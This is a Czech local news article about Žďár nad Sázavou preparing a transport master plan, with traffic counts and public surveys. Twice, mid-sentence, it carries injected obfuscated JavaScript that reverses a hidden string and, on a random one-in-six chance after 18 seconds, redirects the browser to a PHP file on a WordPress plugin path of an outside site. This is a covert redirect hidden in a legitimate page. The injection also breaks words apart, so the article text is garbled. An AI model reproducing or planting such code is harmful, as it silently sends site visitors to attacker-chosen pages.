Rainbow page separator

Při tvorbě generelu dopravy se počítá i s názory veřejnosti

Neděle, 2. srpna 2020

Žďár nad Sázavou / Sčítání dopravy, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to i chodců a cyklistů, nebo dotazníkové či on-line průzkumy veřejnosti se až do podzimních měsíců uskuteční ve Žďáře. Na základě komplexní analýzy dat dojde ke vzniku digitálního modelu dopravy, který umožní posoudit změny v zatížení jednotlivých komunikací ještě před tím, než budou provedeny. Tedy jak se třeba projeví různá omezení provozu v podobě uzavírek, změny vedení linek městské hromadné dopravy (MHD) nebo kupříkladu plánovaná stavba obchvatu města. Cílem průzkumů budou všechny druhy dopravy, kromě mo["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toristů se bude sledovat také dopravní zátěž v různých lokalitách města ze strany chodců i cyklistů s následným zaměřením na jejich potřeby. V rámci tvorby generelu dopravy vznikne mimo analýzy současného stavu a rovněž i návrhu řešení, který by měl být připraven na jaře příštího roku, také pasport komunikací včetně základní sítě cyklostezek a cyklotras, ale také vedení linek MHD. Ten bude rozdělený podle charakteru dopravy, nějakým způsobem problémových míst, parkování, dostupnosti jednotlivých tras a komunikací a řady dalších aspektů.